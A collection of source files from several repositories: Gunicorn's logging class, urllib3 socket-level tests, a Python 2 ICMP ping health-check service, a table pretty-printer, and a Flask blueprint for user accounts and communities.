if cfg.syslog:
self._set_syslog_handler(self.error_log, cfg, self.syslog_fmt, "error")
if not cfg.disable_redirect_access_to_syslog:
self._set_syslog_handler(
self.access_log, cfg, self.syslog_fmt, "access"
)
if cfg.logconfig_dict:
config = CONFIG_DEFAULTS.copy()
config.update(cfg.logconfig_dict)
try:
dictConfig(config)
except (AttributeError, ImportError, ValueError, TypeError) as exc:
raise RuntimeError(str(exc))
elif cfg.logconfig:
if os.path.exists(cfg.logconfig):
defaults = CONFIG_DEFAULTS.copy()
defaults["__file__"] = cfg.logconfig
defaults["here"] = os.path.dirname(cfg.logconfig)
fileConfig(
cfg.logconfig, defaults=defaults, disable_existing_loggers=False
)
else:
msg = "Error: log config '%s' not found"
raise RuntimeError(msg % cfg.logconfig)
def critical(self, msg, *args, **kwargs):
self.error_log.critical(msg, *args, **kwargs)
def error(self, msg, *args, **kwargs):
self.error_log.error(msg, *args, **kwargs)
def warning(self, msg, *args, **kwargs):
self.error_log.warning(msg, *args, **kwargs)
def info(self, msg, *args, **kwargs):
self.error_log.info(msg, *args, **kwargs)
def debug(self, msg, *args, **kwargs):
self.error_log.debug(msg, *args, **kwargs)
def exception(self, msg, *args, **kwargs):
self.error_log.exception(msg, *args, **kwargs)
def log(self, lvl, msg, *args, **kwargs):
if isinstance(lvl, str):
lvl = self.LOG_LEVELS.get(lvl.lower(), logging.INFO)
self.error_log.log(lvl, msg, *args, **kwargs)
def atoms(self, resp, req, environ, request_time):
"""Gets atoms for log formating."""
status = resp.status
if isinstance(status, str):
status = status.split(None, 1)[0]
atoms = {
"h": environ.get("REMOTE_ADDR", "-"),
"l": "-",
"u": self._get_user(environ) or "-",
"t": self.now(),
"r": "%s %s %s"
% (
environ["REQUEST_METHOD"],
environ["RAW_URI"],
environ["SERVER_PROTOCOL"],
),
"s": status,
"m": environ.get("REQUEST_METHOD"),
"U": environ.get("PATH_INFO"),
"q": environ.get("QUERY_STRING"),
"H": environ.get("SERVER_PROTOCOL"),
"b": getattr(resp, "sent", None) is not None and str(resp.sent) or "-",
"B": getattr(resp, "sent", None),
"f": environ.get("HTTP_REFERER", "-"),
"a": environ.get("HTTP_USER_AGENT", "-"),
"T": request_time.seconds,
"D": (request_time.seconds * 1000000) + request_time.microseconds,
"L": "%d.%06d" % (request_time.seconds, request_time.microseconds),
"p": "<%s>" % os.getpid(),
}
# add request headers
if hasattr(req, "headers"):
req_headers = req.headers
else:
req_headers = req
if hasattr(req_headers, "items"):
req_headers = req_headers.items()
atoms.update({"{%s}i" % k.lower(): v for k, v in req_headers})
resp_headers = resp.headers
if hasattr(resp_headers, "items"):
resp_headers = resp_headers.items()
# add response headers
atoms.update({"{%s}o" % k.lower(): v for k, v in resp_headers})
# add environ variables
environ_variables = environ.items()
atoms.update({"{%s}e" % k.lower(): v for k, v in environ_variables})
return atoms
def access(self, resp, req, environ, request_time):
"""See http://httpd.apache.org/docs/2.0/logs.html#combined
for format details
"""
if not (
self.cfg.accesslog
or self.cfg.logconfig
or self.cfg.logconfig_dict
or (self.cfg.syslog and not self.cfg.disable_redirect_access_to_syslog)
):
return
# wrap atoms:
# - make sure atom keys are matched case-insensitively
# - if an atom doesn't exist, replace it with '-'
safe_atoms = self.atoms_wrapper_class(
self.atoms(resp, req, environ, request_time)
)
try:
self.access_log.info(self.cfg.access_log_format, safe_atoms)
except:
self.error(traceback.format_exc())
def now(self):
"""return date in Apache Common Log Format"""
return time.strftime("[%d/%b/%Y:%H:%M:%S %z]")
def reopen_files(self):
if self.cfg.capture_output and self.cfg.errorlog != "-":
for stream in sys.stdout, sys.stderr:
stream.flush()
with self.lock:
if self.logfile is not None:
self.logfile.close()
self.logfile = open(self.cfg.errorlog, "a+")
os.dup2(self.logfile.fileno(), sys.stdout.fileno())
os.dup2(self.logfile.fileno(), sys.stderr.fileno())
for log in loggers():
for handler in log.handlers:
if isinstance(handler, logging.FileHandler):
handler.acquire()
try:
if handler.stream:
handler.close()
handler.stream = handler._open()
finally:
handler.release()
def close_on_exec(self):
for log in loggers():
for handler in log.handlers:
if isinstance(handler, logging.FileHandler):
handler.acquire()
try:
if handler.stream:
util.close_on_exec(handler.stream.fileno())
finally:
handler.release()
def _get_gunicorn_handler(self, log):
for h in log.handlers:
if getattr(h, "_gunicorn", False):
return h
def _set_handler(self, log, output, fmt, stream=None):
# remove previous gunicorn log handler
h = self._get_gunicorn_handler(log)
if h:
log.handlers.remove(h)
if output is not None:
if output == "-":
h = logging.StreamHandler(stream)
else:
util.check_is_writeable(output)
h = logging.FileHandler(output)
# make sure the user can reopen the file
try:
os.chown(h.baseFilename, self.cfg.user, self.cfg.group)
except OSError:
# it's probably OK there, we assume the user has given
# /dev/null as a parameter.
pass
h.setFormatter(fmt)
h._gunicorn = True
log.addHandler(h)
def _set_syslog_handler(self, log, cfg, fmt, name):
# setup format
if not cfg.syslog_prefix:
prefix = cfg.proc_name.replace(":", ".")
else:
prefix = cfg.syslog_prefix
prefix = "gunicorn.%s.%s" % (prefix, name)
# set format
fmt = logging.Formatter(r"%s: %s" % (prefix, fmt))
# syslog facility
try:
facility = SYSLOG_FACILITIES[cfg.syslog_facility.lower()]
except KeyError:
raise RuntimeError("unknown facility name")
# parse syslog address
socktype, addr = parse_syslog_address(cfg.syslog_addr)
# finally setup the syslog handler
h = logging.handlers.SysLogHandler(
address=addr, facility=facility, socktype=socktype
)
h.setFormatter(fmt)
h._gunicorn = True
log.addHandler(h)
def _get_user(self, environ):
user = None
http_auth = environ.get("HTTP_AUTHORIZATION")
if http_auth and http_auth.lower().startswith("basic"):
auth = http_auth.split(" ", 1)
if len(auth) == 2:
try:
# b64decode doesn't accept unicode in Python < 3.3
# so we need to convert it to a byte string
auth = base64.b64decode(auth[1].strip().encode("utf-8"))
# b64decode returns a byte string
auth = auth.decode("utf-8")
auth = auth.split(":", 1)
except (TypeError, binascii.Error, UnicodeDecodeError) as exc:
self.debug("Couldn't get username: %s", exc)
return user
if len(auth) == 2:
user = auth[0]
return user
``` |
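The single-letter keys built in `atoms()` are the substitution variables for Gunicorn's `access_log_format` setting. A typical format string using them, e.g. in a Python config file, is shown below (an illustration, not taken from this file):
```python
# Each %(x)s placeholder maps to a key produced by Logger.atoms() above:
# h=remote address, t=timestamp, r=request line, s=status, b=response length,
# f=referer, a=user agent, L=request time in decimal seconds.
access_log_format = '%(h)s %(l)s %(u)s %(t)s "%(r)s" %(s)s %(b)s "%(f)s" "%(a)s" %(L)s'
```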
{
"source": "1T/urllib3",
"score": 2
} |
#### File: test/with_dummyserver/test_socketlevel.py
```python
from urllib3 import HTTPConnectionPool, HTTPSConnectionPool
from urllib3.poolmanager import proxy_from_url
from urllib3.exceptions import (
MaxRetryError,
ProxyError,
ReadTimeoutError,
SSLError,
)
from urllib3 import util
from dummyserver.testcase import SocketDummyServerTestCase
from dummyserver.server import (
DEFAULT_CERTS, DEFAULT_CA, get_unreachable_address)
from nose.plugins.skip import SkipTest
from threading import Event
import socket
import time
import ssl
class TestCookies(SocketDummyServerTestCase):
def test_multi_setcookie(self):
def multicookie_response_handler(listener):
sock = listener.accept()[0]
buf = b''
while not buf.endswith(b'\r\n\r\n'):
buf += sock.recv(65536)
sock.send(b'HTTP/1.1 200 OK\r\n'
b'Set-Cookie: foo=1\r\n'
b'Set-Cookie: bar=1\r\n'
b'\r\n')
sock.close()
self._start_server(multicookie_response_handler)
pool = HTTPConnectionPool(self.host, self.port)
r = pool.request('GET', '/', retries=0)
self.assertEquals(r.headers, {'set-cookie': 'foo=1, bar=1'})
class TestSNI(SocketDummyServerTestCase):
def test_hostname_in_first_request_packet(self):
if not util.HAS_SNI:
raise SkipTest('SNI-support not available')
done_receiving = Event()
self.buf = b''
def socket_handler(listener):
sock = listener.accept()[0]
self.buf = sock.recv(65536) # We only accept one packet
done_receiving.set() # let the test know it can proceed
sock.close()
self._start_server(socket_handler)
pool = HTTPSConnectionPool(self.host, self.port)
try:
pool.request('GET', '/', retries=0)
except SSLError: # We are violating the protocol
pass
done_receiving.wait()
self.assertTrue(self.host.encode() in self.buf,
"missing hostname in SSL handshake")
class TestSocketClosing(SocketDummyServerTestCase):
def test_recovery_when_server_closes_connection(self):
# Does the pool work seamlessly if an open connection in the
# connection pool gets hung up on by the server, then reaches
# the front of the queue again?
done_closing = Event()
def socket_handler(listener):
for i in 0, 1:
sock = listener.accept()[0]
buf = b''
while not buf.endswith(b'\r\n\r\n'):
buf = sock.recv(65536)
body = 'Response %d' % i
sock.send(('HTTP/1.1 200 OK\r\n'
'Content-Type: text/plain\r\n'
'Content-Length: %d\r\n'
'\r\n'
'%s' % (len(body), body)).encode('utf-8'))
sock.close() # simulate a server timing out, closing socket
done_closing.set() # let the test know it can proceed
self._start_server(socket_handler)
pool = HTTPConnectionPool(self.host, self.port)
response = pool.request('GET', '/', retries=0)
self.assertEqual(response.status, 200)
self.assertEqual(response.data, b'Response 0')
done_closing.wait() # wait until the socket in our pool gets closed
response = pool.request('GET', '/', retries=0)
self.assertEqual(response.status, 200)
self.assertEqual(response.data, b'Response 1')
def test_connection_refused(self):
# Does the pool retry if there is no listener on the port?
host, port = get_unreachable_address()
pool = HTTPConnectionPool(host, port)
self.assertRaises(MaxRetryError, pool.request, 'GET', '/', retries=0)
def test_connection_timeout(self):
timed_out = Event()
def socket_handler(listener):
timed_out.wait()
sock = listener.accept()[0]
sock.close()
self._start_server(socket_handler)
pool = HTTPConnectionPool(self.host, self.port, timeout=0.001)
self.assertRaises(ReadTimeoutError, pool.request, 'GET', '/', retries=0)
timed_out.set()
def test_timeout_errors_cause_retries(self):
def socket_handler(listener):
sock = listener.accept()[0]
# First request.
# Pause before responding so the first request times out.
time.sleep(0.002)
sock.close()
sock = listener.accept()[0]
# Second request.
buf = b''
while not buf.endswith(b'\r\n\r\n'):
buf += sock.recv(65536)
# Now respond immediately.
body = 'Response 2'
sock.send(('HTTP/1.1 200 OK\r\n'
'Content-Type: text/plain\r\n'
'Content-Length: %d\r\n'
'\r\n'
'%s' % (len(body), body)).encode('utf-8'))
sock.close() # Close the socket.
# In situations where the main thread throws an exception, the server
# thread can hang on an accept() call. This ensures everything times
# out within 3 seconds. This should be long enough for any socket
# operations in the test suite to complete
default_timeout = socket.getdefaulttimeout()
socket.setdefaulttimeout(1)
try:
self._start_server(socket_handler)
t = util.Timeout(connect=0.001, read=0.001)
pool = HTTPConnectionPool(self.host, self.port, timeout=t)
response = pool.request('GET', '/', retries=1)
self.assertEqual(response.status, 200)
self.assertEqual(response.data, b'Response 2')
finally:
socket.setdefaulttimeout(default_timeout)
class TestProxyManager(SocketDummyServerTestCase):
def test_simple(self):
def echo_socket_handler(listener):
sock = listener.accept()[0]
buf = b''
while not buf.endswith(b'\r\n\r\n'):
buf += sock.recv(65536)
sock.send(('HTTP/1.1 200 OK\r\n'
'Content-Type: text/plain\r\n'
'Content-Length: %d\r\n'
'\r\n'
'%s' % (len(buf), buf.decode('utf-8'))).encode('utf-8'))
sock.close()
self._start_server(echo_socket_handler)
base_url = 'http://%s:%d' % (self.host, self.port)
proxy = proxy_from_url(base_url)
r = proxy.request('GET', 'http://google.com/')
self.assertEqual(r.status, 200)
# FIXME: The order of the headers is not predictable right now. We
# should fix that someday (maybe when we migrate to
# OrderedDict/MultiDict).
self.assertEqual(sorted(r.data.split(b'\r\n')),
sorted([
b'GET http://google.com/ HTTP/1.1',
b'Host: google.com',
b'Accept-Encoding: identity',
b'Accept: */*',
b'',
b'',
]))
def test_headers(self):
def echo_socket_handler(listener):
sock = listener.accept()[0]
buf = b''
while not buf.endswith(b'\r\n\r\n'):
buf += sock.recv(65536)
sock.send(('HTTP/1.1 200 OK\r\n'
'Content-Type: text/plain\r\n'
'Content-Length: %d\r\n'
'\r\n'
'%s' % (len(buf), buf.decode('utf-8'))).encode('utf-8'))
sock.close()
self._start_server(echo_socket_handler)
base_url = 'http://%s:%d' % (self.host, self.port)
# Define some proxy headers.
proxy_headers = {'For The Proxy': 'YEAH!'}
proxy = proxy_from_url(base_url, proxy_headers=proxy_headers)
conn = proxy.connection_from_url('http://www.google.com/')
r = conn.urlopen('GET', 'http://www.google.com/', assert_same_host=False)
self.assertEqual(r.status, 200)
# FIXME: The order of the headers is not predictable right now. We
# should fix that someday (maybe when we migrate to
# OrderedDict/MultiDict).
self.assertTrue(b'For The Proxy: YEAH!\r\n' in r.data)
def test_retries(self):
def echo_socket_handler(listener):
sock = listener.accept()[0]
# First request, which should fail
sock.close()
# Second request
sock = listener.accept()[0]
buf = b''
while not buf.endswith(b'\r\n\r\n'):
buf += sock.recv(65536)
sock.send(('HTTP/1.1 200 OK\r\n'
'Content-Type: text/plain\r\n'
'Content-Length: %d\r\n'
'\r\n'
'%s' % (len(buf), buf.decode('utf-8'))).encode('utf-8'))
sock.close()
self._start_server(echo_socket_handler)
base_url = 'http://%s:%d' % (self.host, self.port)
proxy = proxy_from_url(base_url)
conn = proxy.connection_from_url('http://www.google.com')
r = conn.urlopen('GET', 'http://www.google.com',
assert_same_host=False, retries=1)
self.assertEqual(r.status, 200)
self.assertRaises(ProxyError, conn.urlopen, 'GET',
'http://www.google.com',
assert_same_host=False, retries=0)
class TestSSL(SocketDummyServerTestCase):
def test_ssl_failure_midway_through_conn(self):
def socket_handler(listener):
sock = listener.accept()[0]
sock2 = sock.dup()
ssl_sock = ssl.wrap_socket(sock,
server_side=True,
keyfile=DEFAULT_CERTS['keyfile'],
certfile=DEFAULT_CERTS['certfile'],
ca_certs=DEFAULT_CA)
buf = b''
while not buf.endswith(b'\r\n\r\n'):
buf += ssl_sock.recv(65536)
# Deliberately send from the non-SSL socket.
sock2.send(('HTTP/1.1 200 OK\r\n'
'Content-Type: text/plain\r\n'
'Content-Length: 2\r\n'
'\r\n'
'Hi').encode('utf-8'))
sock2.close()
ssl_sock.close()
self._start_server(socket_handler)
pool = HTTPSConnectionPool(self.host, self.port)
self.assertRaises(SSLError, pool.request, 'GET', '/', retries=0)
``` |
{
"source": "1tylermitchell/healthcheck",
"score": 3
} |
#### File: 1tylermitchell/healthcheck/ping.py
```python
__date__ = "2014/02/27"
__version__ = "v0.93"
import sys
import time
# -----------------------------------------------------------------------
# A thread based polling service with pause and kill.
# Since it polls the function passed in, the function
# needs to return as soon as possible.
import threading
ST_KILLED = 0
ST_PAUSED = 1
ST_RUNNING = 2
ST_names = { 0:"killed", 1:"paused", 2:"running" }
class Poll(threading.Thread):
def __init__(self, func, args=(), name=None, period=0.1):
# we need a tuple here
if type(args) != type((1,)):
args = (args,)
self._function = func
self._args = args
self.period = period
threading.Thread.__init__(self, target=func, name=name, args=())
self._uptime = time.time()
self._state = ST_RUNNING
self.start()
def run(self):
while self._state != ST_KILLED:
if self._state == ST_RUNNING:
self._function(self._args)
time.sleep(self.period)
# note: all threads must be killed before python will exit!
def kill(self):
self._state = ST_KILLED
def pause(self):
if self._state == ST_RUNNING:
self._state = ST_PAUSED
def resume(self):
if self._state == ST_PAUSED:
self._state = ST_RUNNING
def uptime(self):
return time.time() - self._uptime
def state(self):
return ST_names[self._state]
def __str__(self):
return self.getName()
@staticmethod
def thread_list():
return [x for x in threading.enumerate()
if x.getName() != "MainThread"]
@staticmethod
def tlist():
"""Human readable version of thread_list()"""
for t in Poll.thread_list():
if isinstance(t, Poll):
print "%-16s %-8s %4.3f" % (t, t.state(), t.uptime())
@staticmethod
def killall():
for t in Poll.thread_list():
t.kill()
# -----------------------------------------------------------------------
# ping from scratch
import os
import types
import struct
import socket
class PingService(object):
"""Send out icmp ping requests at 'delay' intervals and
watch for replies. The isup() method can be used by
other threads to check the status of the remote host.
@host - (string) ip of host to ping
@delay - (float) delay in seconds between pings
@its_dead_jim - (int) seconds to wait before running offline()
@verbose - (bool) print round trip stats for every reply
@persistent - (bool) thread continues to run even if no reply
usage: p = PingService('192.168.1.1')
p.start() - begin ping loop
p.isup() - True if host has replied recently
p.stop() - stop ping loop
online() and offline() methods can be overloaded:
def my_online(self):
self.log(self.host + " is up")
p.online = types.MethodType(my_online, p)
"""
# provide a class-wide thread-safe message queue
msgs = []
def __init__(self, host, delay=1.0, its_dead_jim=4,
verbose=True, persistent=False):
self.host = host
self.delay = delay
self.verbose = verbose
self.persistent = persistent
self.obituary_delay = its_dead_jim * delay
self.pad = "getoff my lawn" # should be 14 chars or more
socket.setdefaulttimeout(0.01)
self.started = 0
self.thread = None
self._isup = False
self.sock = socket.socket(socket.AF_INET, socket.SOCK_RAW,
socket.getprotobyname('icmp'))
try:
self.sock.connect((host, 22))
except socket.gaierror, ex:
self.log("ping socket cannot connect to %s: %s" % (host, ex[1]))
self.sock.close()
return
def log(self, msg):
if not self.verbose:
msg = time.strftime("%H:%M:%S ") + msg
self.msgs.append(msg)
def start(self):
self.seq = 0
self.pid = os.getpid()
self.last_heartbeat = 0
# send a ping right away
self.time_to_send = self.started = time.time()
self.thread = Poll(self._ping, (None), name=self.host)
#retry = int(round(self.obituary_delay / 0.2))
## retry, before letting caller deal with a down state
#while retry > 0 and not self._isup:
# time.sleep(0.2)
# retry -= 1
def stop(self):
if self.thread:
self.thread.kill()
self.thread = None
def _icmp_checksum(self, pkt):
n = len(pkt)
two_bytes = struct.unpack("!%sH" % (n/2), pkt)
chksum = sum(two_bytes)
if n & 1 == 1:
chksum += pkt[-1]
chksum = (chksum >> 16) + (chksum & 0xffff)
chksum += chksum >> 16
return ~chksum & 0xffff
def _icmp_create(self, data):
fmt = "!BBH"
args = [8, 0, 0]
if data and len(data) > 0:
fmt += "%ss" % len(data)
args.append(data)
args[2] = self._icmp_checksum(struct.pack(fmt, *args))
return struct.pack(fmt, *args)
def _icmp_parse(self, pkt):
"""Parse ICMP packet"""
string_len = len(pkt) - 4 # skip the 4-byte ICMP header (type, code, checksum)
fmt = "!BBH"
if string_len:
fmt += "%ss" % string_len
unpacked_packet = struct.unpack(fmt, pkt)
typ, code, chksum = unpacked_packet[:3]
if self._icmp_checksum(pkt) != 0:
self.log("%s reply checksum is not zero" % self.host)
try:
data = unpacked_packet[3]
except IndexError:
data = None
return typ, code, data
def _ping(self, args):
pdatafmt = "!HHd%ds" % len(self.pad)
now = time.time()
if now >= self.time_to_send:
# send ping packet
self.seq += 1
self.seq &= 0xffff
pdata = struct.pack(pdatafmt, self.pid, self.seq, now, self.pad)
self.sock.send(self._icmp_create(pdata))
self.time_to_send = now + self.delay
if self._isup and now - self.last_heartbeat > self.obituary_delay:
self._isup = False
self.offline()
if self.last_heartbeat == 0 \
and not self.persistent \
and now - self.started > self.obituary_delay:
if self.verbose:
self.log("no response from " + self.host)
self.thread.kill()
self.thread = None
return
try:
rbuf = self.sock.recv(10000)
now = time.time() # refresh 'now' to make rtt more accurate
except socket.timeout:
return
if len(rbuf) <= 20:
self.log("%s truncated reply" % self.host)
return
# parse ICMP packet; ignore IP header
typ, code, rdata = self._icmp_parse(rbuf[20:])
if typ == 8:
self.log("%s is pinging us" % self.host)
self.last_heartbeat = now
if not self._isup:
self._isup = True
self.online()
return
if typ == 3:
self.log("%s dest unreachable (code=%d)" % (self.host, code));
return
if typ != 0:
self.log("%s packet not an echo reply (%d) " % (self.host, typ))
return
if not rdata:
self.log("%s packet contains no data" % (self.host))
return
if len(rdata) != 12 + len(self.pad):
# other ping programs can cause this
# self.log("%s not our ping (len=%d)" % (self.host, len(rdata)))
return
# parse ping data
(ident, seqno, timestamp, pad) = struct.unpack(pdatafmt, rdata)
if ident != self.pid:
# other instances of PingService can cause this
#self.log("%s not our ping (ident=%d)" % (self.host, ident))
return
if seqno != self.seq:
self.log("%s sequence out of order " % self.host +
"got(%d) expected(%d)" % (seqno, self.seq))
return
if rdata and len(rdata) >= 8:
self.last_heartbeat = now
if not self._isup:
self._isup = True
self.online()
if self.verbose:
str = "%d bytes from %s: seq=%u" % (
len(rbuf),
# inet_ntop not available on windows
'.'.join([('%d' % ord(c)) for c in list(rbuf[12:16])]),
self.seq)
# calculate rounttrip time
rtt = now - timestamp
rtt *= 1000
# note that some boxes that run python
# can't resolve milisecond time deltas ...
if rtt > 0:
str += ", rtt=%.1f ms" % rtt
self.log(str)
def online(self):
if not self.verbose:
self.log("%s is up" % self.host)
def offline(self):
if not self.verbose:
self.log("%s is down" % self.host)
def isup(self):
return self._isup
# ----------------------------------------------------------------------------
# demonstrate PingService
if __name__ == "__main__":
import traceback
import types
if len(sys.argv) < 2:
print "usage: python2 ping.py <ip>"
sys.exit(1)
ping_svc = PingService(sys.argv[1])
try:
ping_svc.start()
while len(Poll.thread_list()) > 0:
time.sleep(0.2)
# print log messages
while len(PingService.msgs) > 0:
print PingService.msgs.pop(0)
except KeyboardInterrupt:
pass
except:
t, v, tb = sys.exc_info()
traceback.print_exception(t, v, tb)
# note: all threads must be stopped before python will exit!
ping_svc.stop()
sys.exit(0)
```
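The class docstring above already outlines the overloading pattern; spelled out as a usage sketch in the same Python 2 style as the module (raw ICMP sockets generally require root, and the address below is a placeholder):
```python
# Usage sketch, not part of the repository.
import time
import types

def my_online(self):
    self.log(self.host + " came online")

p = PingService('192.168.1.1', delay=1.0, verbose=False)
p.online = types.MethodType(my_online, p)   # overload the online() hook
p.start()
time.sleep(5)
print p.isup()
p.stop()
Poll.killall()   # all threads must be stopped before the interpreter can exit
```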
#### File: 1tylermitchell/healthcheck/pprinttable.py
```python
def pprinttable(rows):
if len(rows) > 1:
headers = rows[0]._fields
lens = []
for i in range(len(rows[0])):
lens.append(len(max([x[i] for x in rows] + [headers[i]],key=lambda x:len(str(x)))))
formats = []
hformats = []
for i in range(len(rows[0])):
if isinstance(rows[0][i], int):
formats.append("%%%dd" % lens[i])
else:
formats.append("%%-%ds" % lens[i])
hformats.append("%%-%ds" % lens[i])
pattern = " | ".join(formats)
hpattern = " | ".join(hformats)
separator = "-+-".join(['-' * n for n in lens])
print hpattern % tuple(headers)
print separator
_u = lambda t: t.decode('UTF-8', 'replace') if isinstance(t, str) else t
for line in rows:
print pattern % tuple(_u(t) for t in line)
elif len(rows) == 1:
row = rows[0]
hwidth = len(max(row._fields,key=lambda x: len(x)))
for i in range(len(row)):
print "%*s = %s" % (hwidth,row._fields[i],row[i])
``` |
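`pprinttable` expects namedtuple-like rows because it reads `row._fields` for the header line. A small usage sketch, not from the repository, in the same Python 2 environment as the module:
```python
# Hypothetical rows; integer columns are right-aligned, everything else left-aligned.
from collections import namedtuple

Row = namedtuple('Row', ['host', 'status', 'latency_ms'])
rows = [Row('10.0.0.1', 'up', 12), Row('10.0.0.2', 'down', 8)]
pprinttable(rows)
```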
{
"source": "1UC1F3R616/CommunityAttendanceApp",
"score": 2
} |
#### File: 1UC1F3R616/CommunityAttendanceApp/general.py
```python
from flask import (
Blueprint,
render_template,
request,
jsonify,
make_response
)
# Templates folder and static_folder are for auth routes
general_bp = Blueprint('general_bp',
__name__,
template_folder='templates',
static_folder='static',)
from app import db
from dryFunctions import *
from models import (
Users,
Communities,
CommunityMembers
)
## Imports for Auth Routes
from flask import flash
import threading
from os import environ
from models import BlackListedTokens
sg_api = environ.get('SG_API')
## Keeping all Auth Routes here until the issue is resolved!
@general_bp.route('/register/user', methods=['POST'])
def user_registration():
print('\n\n\n')
print(str(request.json))
print('\n\n\n')
userName = request.json.get('userName')
userEmail = request.json.get('userEmail')
userPassword = request.json.get('userPassword')
userPasswordConfirm = request.json.get('userPasswordConfirm')
if find_missing(userName, userEmail, userPassword, userPasswordConfirm):
payLoad = {
'userName': '',
'userEmail': '',
'message': 'Missing Params'
}
elif userPassword != userPasswordConfirm:
payLoad = {
'userName': '',
'userEmail': '',
'message': 'Confirmation Password Different'
}
elif malformed_length(
{
userName: [3, 64],
userEmail: [3, 64],
userPassword: [3, 64]
}
):
payLoad = {
'userName': '',
'userEmail': '',
'message': 'Param Length is Bad'
}
elif user_exist(email=hex_hash(userEmail)):
payLoad = {
'userName': '',
'userEmail': '',
'message': 'User Exist'
}
elif not is_email_valid(userEmail):
payLoad = {
'userName': '',
'userEmail': '',
'message': 'Email is not valid'
}
else:
try:
userEmailHash = hex_hash(userEmail)
userPasswordHash = hex_hash(userPassword)
new_user = Users(username=userName, email=userEmailHash, password=<PASSWORD>)
db.session.add(new_user)
db.session.commit()
token = encode_auth_token(user_detail(userEmailHash).get('userId')).decode()
payLoad = {
'userName': userName,
'userEmail': userEmailHash,
'message': 'User Successfully Created',
'token': token
}
return make_response(jsonify(payLoad), 201)
except Exception as e:
print(str(e))
db.session.rollback()
payLoad = {
'userName': '',
'userEmail': '',
'message': 'Something went wrong'
}
return make_response(jsonify(payLoad), 400)
@general_bp.route('/login/user', methods=['POST'])
def user_login():
userEmail = request.json.get('userEmail')
userPassword = request.json.get('userPassword')
rememberMe = request.json.get('rememberMe')
if find_missing(userEmail, userPassword, rememberMe):
payLoad = {
'userName': '',
'userEmail': '',
'message': 'Missing Params'
}
elif not user_exist(email=hex_hash(userEmail)):
payLoad = {
'userName': '',
'userEmail': '',
'message': 'User Does not Exist'
}
else:
userEmailHash = hex_hash(userEmail)
userPasswordHash = hex_hash(userPassword)
user_object = user_detail(userEmailHash)
if (userPasswordHash == user_object.get('userPassword')):
token = encode_auth_token(user_object.get('userId'), remember_me=rememberMe).decode()
payLoad = {
'userName': user_object.get('userName'),
'userEmail': userEmailHash,
'message': 'Success LogIn',
'token': token
}
return make_response(jsonify(payLoad), 200)
payLoad = {
'userName': '',
'userEmail': '',
'message': 'Password Mismatch'
}
return make_response(jsonify(payLoad), 400)
@general_bp.route('/password/reset', methods=['POST'])
def forgot_password():
userEmail = request.json.get('userEmail')
if find_missing(userEmail):
payLoad = {
'userEmail': '',
'message': 'Missing Params'
}
elif malformed_length(
{
userEmail: [3, 64],
}
):
payLoad = {
'userEmail': '',
'message': 'Param Length is Bad'
}
elif not user_exist(email=hex_hash(userEmail)):
payLoad = {
"email": userEmail,
"message": "Make a Sign-up"
}
else:
userDetails = user_detail(email=hex_hash(userEmail))
userName = userDetails.get('userName')
passwordResetLink = "https://attendance2hosted.herokuapp.com/auth/password/update/" + \
encode_auth_token(user_id=userEmail, valid_minutes=5).decode()
templateId = "d-bca83b14b0f44357b6a78fe531249832"
url = "https://api.sendgrid.com/v3/mail/send"
print(sg_api)
email_header = {'Content-Type': 'application/json', "Authorization": sg_api}
email_body = {
"personalizations": [
{
"to": [
{
"email": userEmail
}
],
"dynamic_template_data": {
"userName": userName,
"passwordResetLink": passwordResetLink
}
}
],
"from": {
"email": "<EMAIL>"
},
"template_id": templateId
}
threading.Thread(target=send_email, args=(url, email_header, email_body)).start()
#send_email(url, email_header, email_body)
payLoad = {
"email": userEmail,
"message": "Check your email"
}
return make_response(jsonify(payLoad), 202)
return make_response(jsonify(payLoad), 400)
@general_bp.route('/password/update/<emailHashToken>', methods=['GET', 'PATCH', 'POST'])
def password_updation(emailHashToken):
userEmail = decode_auth_token(emailHashToken)
if request.method=='POST':
if userEmail == 'Signature expired. Please log in again.':
flash('I suppose you are timed out')
return render_template('passwordReset.html') # Render to Home Page
elif userEmail == 'Invalid token. Please log in again.':
flash('Maybe Hackers love to play')
return render_template('passwordReset.html') # Render to Home Page
else:
userEmailHash = hex_hash(userEmail)
if not user_exist(userEmailHash):
flash('Firstly you should Create an Account')
return render_template('passwordReset.html') # Render to Home Page #--todo-- # Redirect to home page
userEmail = request.form.get('userEmail')
userPassword = request.form.get('userPassword')
userPasswordConfirm = request.form.get('userPasswordConfirm')
if malformed_length(
{
userEmail: [3, 64],
                    userPassword: [3, 64]
}
):
flash('Password length is Absurd')
return render_template('passwordReset.html')
elif user_detail(hex_hash(userEmail)).get('userEmail') != userEmailHash:
flash('Is this a Typo?')
return render_template('passwordReset.html')
else:
user = Users.query.filter_by(userEmail=userEmailHash).first()
                user.userPassword = hex_hash(userPassword)
db.session.commit()
return render_template('passwordReset.html') #--todo-- # Redirect to home page
return render_template('passwordReset.html')
@general_bp.route('/logout/user', methods=['GET'])
def logout_user():
token = request.headers.get('Authorization')
print(token)
if token:
if isBlackListed(token):
payLoad ={
"message": "logged-out-already"
}
elif malformed_length(
{
token: [3, 1024],
}
):
payLoad = {
'message': ['this-request-is-not-processed',
'length-constraint-applied'
]
}
elif decode_auth_token(token) in ['Signature expired. Please log in again.', 'Invalid token. Please log in again.']:
payLoad = {
"message": ["not-a-valid-request",
"try-login-first"]
}
else:
blackListed = BlackListedTokens(token=token)
db.session.add(blackListed)
db.session.commit()
payLoad = {
"message": "user-logged-out"
}
return make_response(jsonify(payLoad), 200)
payLoad = {
"message": "missing-token"
}
return make_response(jsonify(payLoad), 400)
########################################
# HomePage for Everyone
@general_bp.route('/', methods=['GET'])
def testing_route():
return "Working!!"
@general_bp.route('/community/create', methods=['POST'])
def create_community():
token = request.headers.get('Authorization')
communityName = request.json.get('communityName')
communityDescription = request.json.get('communityDescription')
if find_missing(token, communityName):
payLoad = {
'message': 'missing-params'
}
elif malformed_length(
{
communityName: [1, 64],
communityDescription: [0, 256]
}
):
payLoad = {
'message': 'bad-length-params'
}
elif decode_auth_token(token) in ['Signature expired. Please log in again.', 'Invalid token. Please log in again.']:
payLoad = {
'message': 'fresh-login-required'
}
elif isBlackListed(token):
payLoad = {
'message': 'login-required'
}
else:
        # A user creating two communities with the same name would be a problem
userId = decode_auth_token(token)
        # User existence should be checked here, else SQLAlchemy errors when a well-formed but stale token is sent  #--todo--
try:
comJoinToken = Communities.query.filter(Communities.userId==userId, Communities.communityName==communityName).first().joinToken
if comJoinToken != None:
payLoad = {
'message': ['choose-a-new-name',
'delete-older-community',
'same-community-name-exist']
}
return make_response(jsonify(payLoad), 400)
except Exception as e:
print(str(e))
community = Communities(userId, communityName, communityDescription)
db.session.add(community)
db.session.commit()
communityQuery = Communities.query.filter(Communities.userId==userId, Communities.communityName==communityName).first()
